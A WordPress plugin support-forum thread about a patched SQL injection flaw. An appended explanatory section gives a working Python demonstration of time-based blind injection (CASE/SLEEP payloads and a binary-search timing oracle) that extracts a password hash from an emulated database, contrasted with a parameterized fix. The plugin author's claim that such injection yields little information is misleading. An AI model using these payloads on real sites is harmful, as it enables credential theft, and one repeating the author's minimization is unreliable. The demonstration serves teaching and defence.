• johnbairdconsulting

    (@johnbairdconsulting)


    The plugin had SQL Injection vulnerabilities that would allow admin access without any account. Any random person using the site could gain access to the database.

    SQL injection should not be an issue in 2023 (or 10 years ago) because it's extremely easy to prevent. Such issues existing shows a very low-quality development team that has no knowledge of security.

    Do not use this plugin.

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author QuantumCloud

    (@quantumcloud)

    Thank you for your feedback.

    Some issues were found and patched promptly. We urge everyone to upgrade to the latest version.

    Thread Starter johnbairdconsulting

    (@johnbairdconsulting)

    Yes, but that shouldn’t have happened in the first place. No competent developer makes those mistakes. There are surely many more security holes.

    I confirm our blog was hacked after installing it. We love the idea though. Is it safe to install now?

    • This reply was modified 5 months, 1 week ago by darkzbaron.
    Thread Starter johnbairdconsulting

    (@johnbairdconsulting)

    @dark There will be other security holes if the developers make SQL injection mistakes. Look for another plugin that uses competent developers.

    Plugin Author QuantumCloud

    (@quantumcloud)

    @darkzbaron Sorry for the late reply because of the weekend. Bugs and vulnerabilities are a normal part of any software development life cycle. We learn from our mistakes and do better next time.

    The plugin is currently vetted by security companies like Wordfence and WP Scanner and it is 100% secure to the best of our knowledge.

    It was very unlikely that the hacking on your website happened because of our plugin. The way the MySQL injection issue in our plugin could be exploited was explained like this by Wordfence: "The lack of a UNION operation in the above SQL query makes exploiting this vulnerability more difficult, but a time-based blind injection approach using the SLEEP() function and CASE statements can still be used to extract information from the database by observing the duration of individual queries. While tedious, this technique can be used to extract sensitive information from the database."

    As you can see, there was no easy way to exploit this. You would need to have a very high-profile website before anyone would try to attempt it. Even so, there is very little chance of gaining any meaningful information through this. After all, how much information can you get by observing the time delay of a SQL query?

    At any rate, we suggest using a security plugin like Wordfence on all your websites.

    Thank you!
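The post above quotes Wordfence's description of a time-based blind injection: no UNION, nothing echoed back, only a SLEEP() inside a CASE expression. The example below is added here and is not code from the plugin or from any of the posters. It shows what that timing channel yields in practice: a hypothetical vulnerable lookup that concatenates request input into SQL, an oracle that asks one yes/no question per request and reads the answer from the request duration, and a binary search that recovers a stored password hash from that oracle alone. The same extraction is then run against the parameterized form of the query, where the payload is treated as a literal string. Assumptions: MySQL is emulated with an in-memory SQLite database (SLEEP() registered as a user-defined function; MySQL's ASCII() and SUBSTRING() are spelled unicode() and substr() in SQLite), the plugin_items table and the hash value are constructed, and wp_users/user_pass are simply the real WordPress names for the target column.

```python
"""Time-based blind SQL injection worked through end to end.

Constructed example: the vulnerable lookup, the table contents and the
SLEEP() emulation are assumptions for illustration, not the plugin's code.
MySQL is emulated with an in-memory SQLite database; MySQL's ASCII() and
SUBSTRING() are spelled unicode() and substr() in SQLite.
"""
import sqlite3
import time

SLEEP_SECONDS = 0.04            # delay the injected SLEEP() adds when the condition is true
THRESHOLD = SLEEP_SECONDS / 2   # a request slower than this is read as "true"
SECRET_HASH = "$P$Bexample"     # constructed stand-in for a WordPress password hash
# Scalar subquery for the value the attacker wants. wp_users/user_pass are the
# real WordPress names; the rest of the schema is constructed.
TARGET = "(SELECT user_pass FROM wp_users ORDER BY ID LIMIT 1)"


def make_db() -> sqlite3.Connection:
    """Build the emulated site database with a SLEEP(seconds) function."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the MySQL-style payload works unchanged.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(float(s)) or 0)
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        CREATE TABLE plugin_items (id INTEGER, slug TEXT);
        INSERT INTO plugin_items VALUES (1, 'hello-world');
    """)
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    return conn


def lookup_vulnerable(conn, slug):
    """Hypothetical vulnerable query: request input concatenated into SQL."""
    return conn.execute(
        f"SELECT id FROM plugin_items WHERE slug = '{slug}'").fetchall()


def lookup_fixed(conn, slug):
    """Same query with a bound parameter (what $wpdb->prepare() with %s gives you)."""
    return conn.execute(
        "SELECT id FROM plugin_items WHERE slug = ?", (slug,)).fetchall()


def timing_oracle(conn, lookup, condition):
    """One yes/no question. The query returns no rows and no error either way
    (no UNION, nothing echoed); the only signal is whether it took about
    SLEEP_SECONDS longer than a normal request."""
    payload = (f"x' OR (CASE WHEN {condition} THEN SLEEP({SLEEP_SECONDS}) "
               f"ELSE 0 END) AND '1'='1")
    start = time.perf_counter()
    lookup(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def binary_search(ask, lo, hi):
    """Find v in [lo, hi] given ask(m) answering "is v > m?"; ceil(log2) questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(conn, lookup, target=TARGET, max_len=64):
    """Recover the text of the scalar subquery `target` using only the timing
    oracle: first its length, then each byte by binary search over 0..127.
    Against a parameterized query every answer is "no", so it returns ''."""
    length = binary_search(
        lambda m: timing_oracle(conn, lookup, f"length({target}) > {m}"), 0, max_len)
    recovered = []
    for pos in range(1, length + 1):
        code = binary_search(
            lambda m: timing_oracle(
                conn, lookup, f"unicode(substr({target}, {pos}, 1)) > {m}"),
            0, 127)
        recovered.append(chr(code))
    return "".join(recovered)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaks:", repr(extract_secret(db, lookup_vulnerable)))
    print("parameterized query leaks:", repr(extract_secret(db, lookup_fixed)))
```

Each byte costs seven requests at a fixed delay, so a 34-character phpass hash of the kind WordPress stores costs a few hundred requests and a few minutes of wall-clock time; that is the "tedious" part of Wordfence's description, and it is the only obstacle, since the extraction above needs no rows, no error messages and no UNION. The fix is the second lookup: bind the value instead of concatenating it, which in WordPress means `$wpdb->prepare()` with placeholders for every user-controlled value.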
